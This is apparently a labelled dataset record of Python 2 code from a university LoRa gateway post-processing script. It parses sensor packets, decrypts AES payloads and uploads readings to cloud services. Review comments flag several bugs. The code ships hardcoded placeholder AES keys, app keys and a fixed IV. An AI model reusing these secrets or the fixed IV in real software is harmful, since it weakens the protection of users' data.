                    #creating document to add
                    doc = {
                        "type" : ptypestr,
                        "gateway_eui" : _gwaddr,
                        "node_eui" : src,
                        "snr" : SNR,
                        "rssi" : RSSI,
                        "cr" : cr,
                        "datarate" : "SF"+str(sf)+"BW"+str(bw),
                        "time" : now,
                        # round-trip through json to validate the built string
                        "data" : json.dumps(json.loads(str_json_data))
                    }
                    #adding the document
                    add_document(doc)
                    print("MongoDB: saving done")

                # firebase path: sensor<src>/msg<seq>
                sensor_entry='sensor%d'% (src)
                msg_entry='msg%d' % (seq)
                #upload data to firebase
                firebase_uploadSingleData(firebase_msg, sensor_entry, msg_entry, now)

            elif (ch=='!'): #log on thingspeak, grovestreams, sensorcloud and connectingnature

                ldata = getAllLine()

                # normalize the payload into
                # data_array = [channel, field, nom1, val1, nom2, val2, ...]
                # where channel/field may be '' meaning "use the default"
                # get number of '#' separator
                nsharp = ldata.count('#')
                #no separator
                if nsharp==0:
                    #will use default channel and field
                    data=['','']
                    #contains ['', '', "s1", s1value, "s2", s2value, ...]
                    data_array = data + re.split("/", ldata)
                elif nsharp==1:
                    #only 1 separator
                    data_array = re.split("#|/", ldata)
                    #if the first item has length > 1 then we assume that it is a channel write key
                    if len(data_array[0])>1:
                        #insert '' to indicate default field
                        data_array.insert(1,'');
                    else:
                        #insert '' to indicate default channel
                        data_array.insert(0,'');
                else:
                    #contains [channel, field, "s1", s1value, "s2", s2value, ...]
                    data_array = re.split("#|/", ldata)

                #just in case we have an ending CR or 0
                data_array[len(data_array)-1] = data_array[len(data_array)-1].replace('\n', '')
                data_array[len(data_array)-1] = data_array[len(data_array)-1].replace('\0', '')

                # strip trailing non-digit characters from every value slot
                # (odd indexes starting at 3)
                # NOTE(review): if a value contains no digit at all, the inner
                # while never terminates — assumes numeric sensor values; confirm
                #test if there are characters at the end of each value, then delete these characters
                i = 3
                while i < len(data_array) :
                    while not data_array[i][len(data_array[i])-1].isdigit() :
                        data_array[i] = data_array[i][:-1]
                    i += 2

                if _mongodb :
                    #------------------
                    #saving in MongoDB
                    #------------------

                    #check if new month
                    remove_if_new_month(now)

                    print("MongoDB: saving the document in the collection...")

                    # serialize the nomenclature/value pairs (data_array[2:])
                    # into a JSON object string
                    #saving data in a JSON var
                    str_json_data = "{"
                    #start from the first nomenclature
                    iteration = 2
                    while iteration < len(data_array)-1 :
                        #last iteration, do not add "," at the end
                        if iteration == len(data_array)-2 :
                            str_json_data += "\""+data_array[iteration]+"\" : "+data_array[iteration+1]
                        else :
                            str_json_data += "\""+data_array[iteration]+"\" : "+data_array[iteration+1]+", "
                        iteration += 2
                    str_json_data += "}"

                    #creating document to add
                    doc = {
                        "type" : ptypestr,
                        "gateway_eui" : _gwaddr,
                        "node_eui" : src,
                        "snr" : SNR,
                        "rssi" : RSSI,
                        "cr" : cr,
                        "datarate" : "SF"+str(sf)+"BW"+str(bw),
                        "time" : now,
                        "data" : json.dumps(json.loads(str_json_data))
                    }
                    #adding the document
                    add_document(doc)
                    print("MongoDB: saving done")

                # with '/' separators the payload carries nomenclature keys, so
                # the first value sits at index 3 instead of 2
                # get number of '/' separator
                nslash = ldata.count('/')
                index_first_data = 2
                if nslash==0:
                    # old syntax without nomenclature key
                    index_first_data=2
                else:
                    # new syntax with nomenclature key
                    index_first_data=3

                #------------------
                #test for thingspeak
                #------------------
                if (_thingspeak):
                    # second plotted value: sequence number, or SNR with --thingspeaksnr
                    second_data=str(seq)
                    if (_thingspeaksnr):
                        second_data=str(SNR)
                    #data to send to thingspeak
                    data = []
                    data.append(data_array[0]) #channel (if '' default)
                    data.append(data_array[1]) #field (if '' default)
                    data.append(data_array[index_first_data]) #value to add (the first sensor value in data_array)
                    #upload data to thingspeak
                    #JUST FOR UPLOAD A SINGLE DATA IN A SPECIFIC FIELD AND SECOND DATA
                    thingspeak_uploadSingleData(data, second_data)
                    # if you want to upload all data starting at field 1, uncomment next line, and comment previous line
                    #thingspeak_uploadMultipleData(data_array) # upload all data in the fields

                #------------------
                #test for FIWARE
                #need FIWARE access
                #------------------
                if (_fiware):
                    print("FIWARE: upload")
                    #entity_id = 'test_item_'+now.isoformat()
                    entity_id = 'sensor%d'% (src)
                    # delegate the entity update to an external python script
                    #send the first sensor value in data_array
                    cmd = 'python ./fiware_UpdateEntityAttribute.py '+entity_id+' test temperature float '+data_array[index_first_data]
                    print("FiWare: will issue python script")
                    print(cmd)
                    args = cmd.split()
                    try:
                        out = subprocess.check_output(args, shell=False)
                    except subprocess.CalledProcessError:
                        print("FiWare: python script failed")
                    # NOTE(review): if check_output raised, 'out' keeps its value
                    # from a previous iteration (or is undefined on the first one)
                    if out.find('"reasonPhrase" : "OK"') > 0:
                        print("FiWare: Entity updated with ENTITY_ID "+entity_id)
                    else:
                        print("FiWare: Entity update failed")

                #------------------
                #test for sensorcloud
                #------------------
                if (_sensorcloud) :
                    #send the first sensor value in data_array
                    sensorcloud_uploadSingleData(data_array[index_first_data])

                #------------------
                #test for grovestreams
                #------------------
                if (_grovestreams):
                    nomenclatures = []
                    data = []
                    if nslash==0:
                        # old syntax without nomemclature key, so insert only one key
                        nomenclatures.append("temp")
                        data.append(data_array[index_first_data])
                    else:
                        #completing nomenclatures and data
                        i=2
                        while i < len(data_array)-1 :
                            nomenclatures.append(data_array[i])
                            data.append(data_array[i+1])
                            i += 2
                    #upload data to grovestreams
                    grovestreams_uploadSingleData(nomenclatures, data, str(src))

            # END
            #////////////////////////////////////////////////////////////
            else: # not a known data logging prefix
                #you may want to upload to a default service
                #so just implement it here
                print('unrecognized data logging prefix: discard data')
                getAllLine()
        else:
            print('invalid app key: discard data')
            getAllLine()
        continue

    # handle binary prefixes
    if (ch == '\xFF' or ch == '+'):
        #if (ch == '\xFF'):
        print("got first framing byte")
        ch=getSingleChar()

        # data prefix for non-encrypted data
        if (ch == '\xFE' or ch == '+'):
            #if (ch == '\xFE'):
            #the data prefix is inserted by the gateway
            #do not modify, unless you know what you are doing and that you modify lora_gateway (comment WITH_DATA_PREFIX)
            print("--> got data prefix")

            #we actually need to use DATA_PREFIX in order to differentiate data from radio coming to the post-processing stage
            #if _wappkey is set then we have to first indicate that _validappkey=0
            if (_wappkey==1):
                _validappkey=0
            else:
                _validappkey=1

            # if we have raw output from gw, then try to determine which kind of packet it is
            if (_rawFormat==1):
                ch=getSingleChar()

                # probably our modified Libelium header where the destination is the gateway
                # dissect our modified Libelium format
                # NOTE(review): ch is a 1-char string here, so `ch==1` compares
                # str to int and is always False in Python 2; presumably this
                # was meant to be ord(ch)==1 (dst == gateway) — confirm
                if ch==1:
                    dst=ord(ch)
                    ptype=ord(getSingleChar())
                    src=ord(getSingleChar())
                    seq=ord(getSingleChar())
                    print("Libelium[dst=%d ptype=0x%.2X src=%d seq=%d]" % (dst,ptype,src,seq))
                    # now we read datalen-4 (the header length) bytes in our line buffer
                    # (datalen comes from the preceding ^p control line)
                    fillLinebuf(datalen-HEADER_SIZE)

                # TODO: dissect LoRaWAN
                # you can implement LoRaWAN decoding if this is necessary for your system
                # look at the LoRaWAN packet format specification to dissect the packet in detail
                #
                # LoRaWAN uses the MHDR(1B)
                # ----------------------------
                # | 7 6 5 | 4 3 2 | 1 0 |
                # ----------------------------
                #   MType    RFU    major
                #
                # the main MType is unconfirmed data up which value is 010
                # NOTE(review): `ch & 0x40` applies & to a str, which raises
                # TypeError in Python 2; likely meant ord(ch) & 0x40 — confirm
                if (ch & 0x40)==0x40:
                    # Do the LoRaWAN decoding
                    print("LoRaWAN?")
                    # for the moment just discard the data
                    fillLinebuf(datalen-1)
                    getAllLine()
            else:
                # now we read datalen bytes in our line buffer
                fillLinebuf(datalen)

            # encrypted data payload?
            if ((ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED):
                print("--> DATA encrypted: encrypted payload size is %d" % datalen)
                _hasClearData=0
                if _aes==1:
                    print("--> decrypting")
                    # uses the module-level fixed aes_key/aes_iv (not the
                    # per-appkey dictionaries defined earlier in the file)
                    decrypt_handler = AES.new(aes_key, AES.MODE_CBC, aes_iv)
                    # decrypt
                    s = decrypt_handler.decrypt(_linebuf)
                    # hex dump of the decrypted buffer
                    for i in range(0, len(s)):
                        print "%.2X " % ord(s[i]),
                    print "\nEnd"
                    # get the real (decrypted) payload size
                    # (stored by the sender right after the 4-byte app key)
                    rsize = ord(s[APPKEY_SIZE])
                    print("--> real payload size is %d" % rsize)
                    # then add the appkey + the appkey framing bytes
                    rsize = rsize+APPKEY_SIZE+1
                    # rebuild _linebuf as appkey + clear payload, dropping the
                    # length byte in between
                    _linebuf = s[:APPKEY_SIZE] + s[APPKEY_SIZE+1:rsize]
                    for i in range(0, len(_linebuf)):
                        print "%.2X " % ord(_linebuf[i]),
                    print "\nEnd"
                    # normally next read from input will get data from the decrypted _linebuf
                    print "--> decrypted payload is: ",
                    print _linebuf[APPKEY_SIZE:]
                    _hasClearData=1
                else:
                    print("--> DATA encrypted: aes not activated")
                    # drain stdin of all the encrypted data
                    enc_data=getAllLine()
                    print("--> discard encrypted data")
            else:
                _hasClearData=1

            # with_appkey?
            if ((ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY and _hasClearData==1):
                print("--> DATA with_appkey: read app key sequence")

                # the app key is the first 4 bytes of the (clear) payload
                the_app_key = getSingleChar()
                the_app_key = the_app_key + getSingleChar()
                the_app_key = the_app_key + getSingleChar()
                the_app_key = the_app_key + getSingleChar()

                print "app key is ",
                print " ".join("0x{:02x}".format(ord(c)) for c in the_app_key)

                if the_app_key in app_key_list:
                    print("in app key list")
                    if _wappkey==1:
                        _validappkey=1
                else:
                    print("not in app key list")
                    if _wappkey==1:
                        _validappkey=0
            else:
                #we do not check for app key
                _validappkey=1
                print("but app key disabled")
            continue

    # '?'-prefixed lines are comments from the gateway; drop the whole line
    if (ch == '?' and _ignoreComment==1):
        sys.stdin.readline()
        continue

    # anything unrecognized is echoed through unchanged
    sys.stdout.write(ch)
|
normal
|
{
"blob_id": "475cb57ce5fda0d0389bfa1b9b227a2147e1abde",
"index": 9389,
"step-1": "#------------------------------------------------------------\n# Copyright 2016 Congduc Pham, University of Pau, France.\n# \n# Congduc.Pham@univ-pau.fr\n#\n# This file is part of the low-cost LoRa gateway developped at University of Pau\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with the program. If not, see <http://www.gnu.org/licenses/>.\n#------------------------------------------------------------\n\n# IMPORTANT\n# Parts that can be modified are identified with\n\n#////////////////////////////////////////////////////////////\n# TEXT\n\n# END\n#////////////////////////////////////////////////////////////\n\nimport sys\nimport select\nimport threading\nfrom threading import Timer\nimport time\nimport datetime\nimport getopt\nimport os\nimport json\nimport re\n\n#////////////////////////////////////////////////////////////\n# ADD HERE BOOLEAN VARIABLES TO SUPPORT OTHER CLOUDS\n# OR VARIABLES FOR YOUR OWN NEEDS \n#////////////////////////////////////////////////////////////\n\n#------------------------------------------------------------\n#with firebase support?\n#------------------------------------------------------------\n_firebase=False\n\n#------------------------------------------------------------\n#with thingspeak support?\n#------------------------------------------------------------\n_thingspeak=False\n#plot snr instead of 
seq\n_thingspeaksnr=False\n\n#------------------------------------------------------------\n#with sensorcloud support?\n#------------------------------------------------------------\n_sensorcloud=False\n\n#------------------------------------------------------------\n#with grovestreams support?\n#------------------------------------------------------------\n_grovestreams=False\n\n#------------------------------------------------------------\n#with fiware support?\n#------------------------------------------------------------\n_fiware=False\n\n#////////////////////////////////////////////////////////////\n# ADD HERE APP KEYS THAT YOU WANT TO ALLOW FOR YOUR GATEWAY\n#////////////////////////////////////////////////////////////\n# NOTE: the format of the application key list has changed from \n# a list of list, to a list of string that will be process as \n# a byte array. Doing so wilL allow for dictionary construction\n# using the appkey to retrieve information such as encryption key,...\n\napp_key_list = [\n\t#for testing\n\t'****',\n\t#change here your application key\n\t'\\x01\\x02\\x03\\x04',\n\t'\\x05\\x06\\x07\\x08' \n]\n\n#////////////////////////////////////////////////////////////\n#FOR AES DECRYPTION\n#////////////////////////////////////////////////////////////\n\n#put your key here, should match the end-device's key\naes_key=\"0123456789010123\"\n#put your initialisation vector here, should match the end-device's initialisation vector\naes_iv=\"\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\"\n#aes_iv=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\n\n#association between appkey and aes_key\nappkey_aeskey = {\n\t'\\x01\\x02\\x03\\x04':\"0123456789010123\",\n\t'\\x05\\x06\\x07\\x08':\"0123456789010123\"\n}\n\n#association between appkey and aes_iv\nappkey_aesiv = 
{\n\t'\\x01\\x02\\x03\\x04':\"\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\",\n\t'\\x05\\x06\\x07\\x08':\"\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\"\n}\n\n# END\n#////////////////////////////////////////////////////////////\n\n#------------------------------------------------------------\n#header packet information\n#------------------------------------------------------------\n\nHEADER_SIZE=4\nAPPKEY_SIZE=4\nPKT_TYPE_DATA=0x10\nPKT_TYPE_ACK=0x20\n\nPKT_FLAG_ACK_REQ=0x08\nPKT_FLAG_DATA_ENCRYPTED=0x04\nPKT_FLAG_DATA_WAPPKEY=0x02\nPKT_FLAG_DATA_ISBINARY=0x01\n\n#------------------------------------------------------------\n#last pkt information\n#------------------------------------------------------------\ndst=0\nptype=0\nptypestr=\"N/A\"\nsrc=0\nseq=0\ndatalen=0\nSNR=0\nRSSI=0\nbw=0\ncr=0\nsf=0\n#------------------------------------------------------------\n\n#------------------------------------------------------------\n#will ignore lines beginning with '?'\n#------------------------------------------------------------\n_ignoreComment=1\n\n#------------------------------------------------------------\n#with mongoDB support?\n#------------------------------------------------------------\n_mongodb = False\n\n#------------------------------------------------------------\n#log gateway message?\n#------------------------------------------------------------\n_logGateway=0\n\n#------------------------------------------------------------\n#raw output from gateway?\n#------------------------------------------------------------\n_rawFormat=0\n#------------------------------------------------------------\n_ourcustomFormat=0;\n_lorawanFormat=0\n#------------------------------------------------------------\n\n#------------------------------------------------------------\n#check for app 
key?\n#------------------------------------------------------------\n_wappkey=0\n#------------------------------------------------------------\nthe_app_key = '\\x00\\x00\\x00\\x00'\n\n#valid app key? by default we do not check for the app key\n_validappkey=1\n\n#------------------------------------------------------------\n#for local AES decrypting\n#------------------------------------------------------------\t\n_aes=0\n_hasClearData=0\n\n#------------------------------------------------------------\n#open json file to recover gateway_address\n#------------------------------------------------------------\nf = open(os.path.expanduser(\"local_conf.json\"),\"r\")\nlines = f.readlines()\nf.close()\narray = \"\"\n#get all the lines in a string\nfor line in lines :\n\tarray += line\n\n#change it into a python array\njson_array = json.loads(array)\n\n#set the gateway_address for having different log filenames\n_gwaddr = json_array[\"gateway_conf\"][\"gateway_ID\"]\n\n#////////////////////////////////////////////////////////////\n# CHANGE HERE THE VARIOUS PATHS FOR YOUR LOG FILES\n#////////////////////////////////////////////////////////////\n_folder_path = \"/home/pi/Dropbox/LoRa-test/\"\n_gwlog_filename = _folder_path+\"gateway_\"+str(_gwaddr)+\".log\"\n_telemetrylog_filename = _folder_path+\"telemetry_\"+str(_gwaddr)+\".log\"\n\n# END\n#////////////////////////////////////////////////////////////\n\n\n#------------------------------------------------------------\n#initialize gateway DHT22 sensor\n#------------------------------------------------------------\n_gw_dht22 = json_array[\"gateway_conf\"][\"dht22\"]\n_date_save_dht22 = None\n\nif(_gw_dht22):\n\tprint \"Use DHT22 to get gateway temperature and humidity level\"\n\t#read values from dht22 in the gateway box\n\tsys.path.insert(0, os.path.expanduser('./sensors_in_raspi/dht22'))\n\tfrom read_dht22 import get_dht22_values\n\t\n\t_temperature = 0\n\t_humidity = 0\n\n# retrieve dht22 values\ndef 
save_dht22_values():\n\tglobal _temperature, _humidity, _date_save_dht22\n\t_humidity, _temperature = get_dht22_values()\n\t\n\t_date_save_dht22 = datetime.datetime.utcnow()\n\n\tprint \"Gateway TC : \"+_temperature+\" C | HU : \"+_humidity+\" % at \"+str(_date_save_dht22)\n\t\n\t#save values from the gateway box's DHT22 sensor, if _mongodb is true\n\tif(_mongodb):\n\t\t#saving data in a JSON var\n\t\tstr_json_data = \"{\\\"th\\\":\"+_temperature+\", \\\"hu\\\":\"+_humidity+\"}\"\n\t\n\t\t#creating document to add\n\t\tdoc = {\n\t\t\t\"type\" : \"DATA_GW_DHT22\",\n\t\t\t\"gateway_eui\" : _gwaddr, \n\t\t\t\"node_eui\" : \"gw\",\n\t\t\t\"snr\" : \"\", \n\t\t\t\"rssi\" : \"\", \n\t\t\t\"cr\" : \"\", \n\t\t\t\"datarate\" : \"\", \n\t\t\t\"time\" : _date_save_dht22,\n\t\t\t\"data\" : json.dumps(json.loads(str_json_data))\n\t\t}\n\t\n\t\t#adding the document\n\t\tadd_document(doc)\n\t\ndef dht22_target():\n\twhile True:\n\t\tprint \"Getting gateway temperature\"\n\t\tsave_dht22_values()\n\t\tsys.stdout.flush()\t\n\t\tglobal _gw_dht22\n\t\ttime.sleep(_gw_dht22)\n\n\n#------------------------------------------------------------\n#for managing the input data when we can have aes encryption\n#------------------------------------------------------------\n_linebuf=\"the line buffer\"\n_linebuf_idx=0\n_has_linebuf=0\n\ndef getSingleChar():\n\tglobal _has_linebuf\n\t# if we have a valid _linebuf then read from _linebuf\n\tif _has_linebuf==1:\n\t\tglobal _linebuf_idx\n\t\tglobal _linebuf\n\t\tif _linebuf_idx < len(_linebuf):\n\t\t\t_linebuf_idx = _linebuf_idx + 1\n\t\t\treturn _linebuf[_linebuf_idx-1]\n\t\telse:\n\t\t\t# no more character from _linebuf, so read from stdin\n\t\t\t_has_linebuf = 0\n\t\t\treturn sys.stdin.read(1)\n\telse:\n\t\treturn sys.stdin.read(1)\t\n\t\ndef getAllLine():\n\tglobal _linebuf_idx\n\tp=_linebuf_idx\n\t_linebuf_idx = 0\n\tglobal _has_linebuf\n\t_has_linebuf = 0\t\n\tglobal _linebuf\n\t# return the remaining of the string and clear the 
_linebuf\n\treturn _linebuf[p:]\t\n\t\ndef fillLinebuf(n):\n\tglobal _linebuf_idx\n\t_linebuf_idx = 0\n\tglobal _has_linebuf\n\t_has_linebuf = 1\n\tglobal _linebuf\n\t# fill in our _linebuf from stdin\n\t_linebuf=sys.stdin.read(n)\n\n\n#////////////////////////////////////////////////////////////\n# ADD HERE OPTIONS THAT YOU MAY WANT TO ADD\n# BE CAREFUL, IT IS NOT ADVISED TO REMOVE OPTIONS UNLESS YOU\n# REALLY KNOW WHAT YOU ARE DOING\n#////////////////////////////////////////////////////////////\n\n#------------------------------------------------------------\n#for parsing the options\n#------------------------------------------------------------\n\ndef main(argv):\n\ttry:\n\t\topts, args = getopt.getopt(argv,'iftLam:',[\\\n\t\t'ignorecomment',\\\n\t\t'firebase',\\\n\t\t'thingspeak',\\\n\t\t'retrythsk',\\\n\t\t'thingspeaksnr',\\\n\t\t'fiware',\\\n\t\t'sensorcloud',\\\n\t\t'grovestreams',\\\n\t\t'loggw',\\\n\t\t'addr',\\\n\t\t'wappkey',\\\n\t\t'raw',\\\n\t\t'aes',\\\n\t\t'mongodb'])\n\t\t\n\texcept getopt.GetoptError:\n\t\tprint 'post_processing_gw '+\\\n\t\t'-i/--ignorecomment '+\\\n\t\t'-f/--firebase '+\\\n\t\t'-t/--thingspeak '+\\\n\t\t'--retrythsk '+\\\n\t\t'--thingspeaksnr '+\\\n\t\t'--fiware '+\\\n\t\t'--sensorcloud '+\\\n\t\t'--grovestreams '+\\\n\t\t'-L/--loggw '+\\\n\t\t'-a/--addr '+\\\n\t\t'--wappkey '+\\\n\t\t'--raw '+\\\n\t\t'--aes '+\\\n\t\t'-m/--mongodb'\n\t\t\n\t\tsys.exit(2)\n\t\n\tfor opt, arg in opts:\n\t\tif opt in (\"-i\", \"--ignorecomment\"):\n\t\t\tprint(\"will ignore commented lines\")\n\t\t\tglobal _ignoreComment\n\t\t\t_ignoreComment = 1\n\t\t\t\n\t\telif opt in (\"-f\", \"--firebase\"):\n\t\t\tprint(\"will enable firebase support\")\n\t\t\tglobal _firebase\n\t\t\t_firebase = True\n\t\t\tglobal firebase_uploadSingleData\n\t\t\tfrom FireBase import firebase_uploadSingleData\n\n\t\telif opt in (\"-t\", \"--thingspeak\"):\n\t\t\tprint(\"will enable thingspeak support\")\n\t\t\tglobal _thingspeak\n\t\t\t_thingspeak = True\n\t\t\tglobal 
thingspeak_uploadSingleData, thingspeak_uploadMultipleData\n\t\t\tfrom ThingSpeak import thingspeak_uploadSingleData, thingspeak_uploadMultipleData\n\t\t\t\n\t\telif opt in (\"--retrythsk\"):\n\t\t\tprint(\"will enable thingspeak retry\")\n\t\t\tglobal thingspeak_setRetry\n\t\t\tfrom ThingSpeak import thingspeak_setRetry\n\t\t\t#set retry to True\n\t\t\tthingspeak_setRetry(True)\n\n\t\telif opt in (\"--thingspeaksnr\"):\n\t\t\tprint(\"will plot snr instead of seq\")\n\t\t\tglobal _thingspeaksnr\n\t\t\t_thingspeaksnr = True\n\t\t\t\n\t\telif opt in (\"--fiware\"):\n\t\t\tprint(\"will enable fiware support\")\n\t\t\tglobal _fiware\n\t\t\t_fiware = True\n\n\t\telif opt in (\"--sensorcloud\"):\n\t\t\tprint(\"will enable sensorcloud support\")\n\t\t\tglobal _sensorcloud\n\t\t\t_sensorcloud = True\n\t\t\tglobal sensorcloud_uploadSingleData\n\t\t\tfrom SensorCloud import sensorcloud_uploadSingleData\n\n\t\telif opt in (\"--grovestreams\"):\n\t\t\tprint(\"will enable grovestreams support\")\n\t\t\tglobal _grovestreams\n\t\t\t_grovestreams = True\n\t\t\tglobal grovestreams_uploadSingleData\n\t\t\tfrom GroveStreams import grovestreams_uploadSingleData\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\telif opt in (\"-L\", \"--loggw\"):\n\t\t\tprint(\"will log gateway message prefixed by ^$\")\n\t\t\tglobal _logGateway\n\t\t\t_logGateway = 1\t\n\n\t\telif opt in (\"-a\", \"--addr\"):\n\t\t\tglobal _gwaddr\n\t\t\t_gwaddr = arg\n\t\t\tprint(\"overwrite: will use _\"+str(_gwaddr)+\" for gateway and telemetry log files\")\n\t\t\t\n\t\telif opt in (\"--wappkey\"):\n\t\t\tglobal _wappkey\n\t\t\t_wappkey = 1\n\t\t\tglobal _validappkey\n\t\t\t_validappkey=0\n\t\t\tprint(\"will check for correct app key\")\n\n\t\telif opt in (\"--raw\"):\n\t\t\tglobal _rawFormat\n\t\t\t_rawFormat = 1\n\t\t\tprint(\"raw output from gateway. 
post_processing_gw will handle packet format\")\n\t\t\t\n\t\telif opt in (\"--aes\"):\n\t\t\tglobal _aes\n\t\t\t_aes = 1\n\t\t\tglobal AES\n\t\t\tfrom Crypto.Cipher import AES\n\t\t\tprint(\"enable AES encrypted data\")\n\t\t\t\t\t\t\n\t\telif opt in (\"-m\", \"--mongodb\"):\n\t\t\tprint(\"will enable local MongoDB support, max months to store is \"+arg)\n\t\t\tglobal _mongodb\n\t\t\t_mongodb = True\n\t\t\t\n\t\t\tglobal add_document, remove_if_new_month, mongodb_set_max_months\n\t\t\tfrom MongoDB import add_document, remove_if_new_month, mongodb_set_max_months\n\t\t\t#setting max months\n\t\t\tmongodb_set_max_months(int(arg))\n\n# END\n#////////////////////////////////////////////////////////////\t\t\t\n\t\t\t\t\t\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n\n#gateway dht22\nif (_gw_dht22):\n\tprint \"Starting thread to measure gateway temperature\"\n\tt = threading.Thread(target=dht22_target)\n\tt.daemon = True\n\tt.start()\n\nprint \"Current working directory: \"+os.getcwd()\n\nwhile True:\n\n\tsys.stdout.flush()\n \tch = getSingleChar()\n\n#expected prefixes\n#\t^p \tindicates a ctrl pkt info ^pdst(%d),ptype(%d),src(%d),seq(%d),len(%d),SNR(%d),RSSI=(%d) for the last received packet\n#\t\texample: ^p1,16,3,0,234,8,-45\n#\n#\t^r\tindicate a ctrl radio info ^rbw,cr,sf for the last received packet\n#\t\texample: ^r500,5,12\n#\n#\t^$\tindicates an output (debug or log purposes) from the gateway that should be logged in the (Dropbox) gateway.log file \n#\t\texample: ^$Set LoRa mode 4\n#\n#\t^l\tindicates a ctrl LAS info ^lsrc(%d),type(%d)\n#\t\ttype is 1 for DSP_REG, 2 for DSP_INIT, 3 for DSP_UPDT, 4 for DSP_DATA \n#\t\texample: ^l3,4\n#\n#\t\\$\tindicates a message that should be logged in the (Dropbox) telemetry.log file\n#\t\texample: \\$hello -> \thello will be logged in the following format\n#\t\t\t\t\t(src=3 seq=0 len=6 SNR=8 RSSI=-54) 2015-10-16T14:47:44.072230> hello \n#\n#\t\\&\tindicates a message that should be logged in the firebase cloud 
database\n#\t\texample: \\&hello ->\thello will be logged in json format\n#\n#\t\\!\tindicates a message that should be logged on a thingspeak channel\n#\t\texample: \\!SGSH52UGPVAUYG3S#9.4 ->\t9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at default field, i.e. field 1\n#\t\t\t\t \\!2#9.4 -> 9.4 will be logged in the default channel at field 2\n#\t\t\t\t \\!SGSH52UGPVAUYG3S#2#9.4 -> 9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at field 2\n#\n#\t\tyou can log other information such as src, seq, len, SNR and RSSI on specific fields\n#\n#\t\\xFF\\xFE\t\tindicates radio data prefix\n#\n#\n\n#------------------------------------------------------------\n# '^' is reserved for control information from the gateway\n#------------------------------------------------------------\n\n\tif (ch=='^'):\n\t\tnow = datetime.datetime.utcnow()\n\t\tch=sys.stdin.read(1)\n\t\t\n\t\tif (ch=='p'):\t\t\n\t\t\tdata = sys.stdin.readline()\n\t\t\tprint now.isoformat()\n\t\t\tprint \"rcv ctrl pkt info (^p): \"+data,\n\t\t\tarr = map(int,data.split(','))\n\t\t\tprint \"splitted in: \",\n\t\t\tprint arr\n\t\t\tdst=arr[0]\n\t\t\tptype=arr[1]\n\t\t\tptypestr=\"N/A\"\n\t\t\tif ((ptype & 0xF0)==PKT_TYPE_DATA):\n\t\t\t\tptypestr=\"DATA\"\n\t\t\t\tif (ptype & PKT_FLAG_DATA_ISBINARY)==PKT_FLAG_DATA_ISBINARY:\n\t\t\t\t\tptypestr = ptypestr + \" IS_BINARY\"\n\t\t\t\tif (ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY:\n\t\t\t\t\tptypestr = ptypestr + \" WAPPKEY\"\n\t\t\t\tif (ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED:\n\t\t\t\t\tptypestr = ptypestr + \" ENCRYPTED\"\n\t\t\t\tif (ptype & PKT_FLAG_ACK_REQ)==PKT_FLAG_ACK_REQ:\n\t\t\t\t\tptypestr = ptypestr + \" ACK_REQ\"\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tif ((ptype & 0xF0)==PKT_TYPE_ACK):\n\t\t\t\tptypestr=\"ACK\"\t\t\t\t\t\n\t\t\tsrc=arr[2]\n\t\t\tseq=arr[3]\n\t\t\tdatalen=arr[4]\n\t\t\tSNR=arr[5]\n\t\t\tRSSI=arr[6]\n\t\t\tif (_rawFormat==0):\t\n\t\t\t\tinfo_str=\"(dst=%d type=0x%.2X(%s) src=%d seq=%d 
len=%d SNR=%d RSSI=%d)\" % (dst,ptype,ptypestr,src,seq,datalen,SNR,RSSI)\n\t\t\telse:\n\t\t\t\tinfo_str=\"rawFormat(len=%d SNR=%d RSSI=%d)\" % (datalen,SNR,RSSI)\t\n\t\t\tprint info_str\n\t\t\t# TODO: maintain statistics from received messages and periodically add these informations in the gateway.log file\n\n\t\tif (ch=='r'):\t\t\n\t\t\tdata = sys.stdin.readline()\n\t\t\tprint \"rcv ctrl radio info (^r): \"+data,\n\t\t\tarr = map(int,data.split(','))\n\t\t\tprint \"splitted in: \",\n\t\t\tprint arr\n\t\t\tbw=arr[0]\n\t\t\tcr=arr[1]\n\t\t\tsf=arr[2]\n\t\t\tinfo_str=\"(BW=%d CR=%d SF=%d)\" % (bw,cr,sf)\n\t\t\tprint info_str\n\n\t\tif (ch=='t'):\n\t\t\trcv_timestamp = sys.stdin.readline()\n\t\t\tprint \"rcv timestamp (^t): \"+rcv_timestamp\n\t\t\t\t\t\t\t\t\t\n\t\tif (ch=='l'):\n\t\t\t# TODO: LAS service\t\n\t\t\tprint 'not implemented yet'\n\t\t\t\n\t\tif (ch=='$' and _logGateway==1):\n\t\t\tdata = sys.stdin.readline()\n\t\t\tprint \"rcv gw output to log (^$): \"+data,\n\t\t\tf=open(os.path.expanduser(_gwlog_filename),\"a\")\n\t\t\tf.write(now.isoformat()+'> ')\n\t\t\tf.write(data)\n\t\t\tf.close()\t\t\t\t\t\n\t\tcontinue\n\n\n#------------------------------------------------------------\n# '\\' is reserved for message logging service\n#------------------------------------------------------------\n\n\tif (ch=='\\\\'):\n\t\tnow = datetime.datetime.utcnow()\n\t\t\n\t\tif _validappkey==1:\n\n\t\t\tprint 'valid app key: accept data'\n\t\t\t\t\t\n\t\t\tch=getSingleChar()\t\t\t\n\t\t\t\t\t\n\t\t\tif 